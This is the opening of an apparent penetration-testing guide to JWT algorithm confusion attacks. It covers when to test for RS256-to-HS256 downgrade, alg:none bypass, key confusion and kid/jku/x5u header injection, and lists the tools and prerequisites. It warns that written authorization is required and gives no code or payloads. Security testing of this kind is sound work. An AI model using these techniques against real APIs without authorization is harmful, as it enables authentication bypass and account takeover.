Exploiting JWT Algorithm Confusion Attack

When to Use

• Testing APIs that use RS256 (asymmetric) JWT tokens for authentication to check for algorithm downgrade to HS256
• Assessing JWT implementations for alg:none bypass where the server skips signature verification
• Evaluating JWT libraries for key confusion vulnerabilities where the public key is used as HMAC secret
• Testing kid (Key ID), jku (JWK Set URL), and x5u (X.509 URL) header parameters for injection
• Validating that the API server enforces a specific algorithm and does not trust the JWT header

Do not use without written authorization. JWT exploitation can lead to authentication bypass and account takeover.

Prerequisites

• Written authorization specifying the target API and JWT-based authentication in scope
• A valid JWT token from the target API (obtained through legitimate authentication)
• The server's RSA public key (obtainable from JWKS endpoint, TLS certificate, or public key endpoint)
• Python 3.10+ with PyJWT, cryptography, and requests libraries
• jwt_tool for automated JWT attack testing
• Burp Suite with JWT Editor extension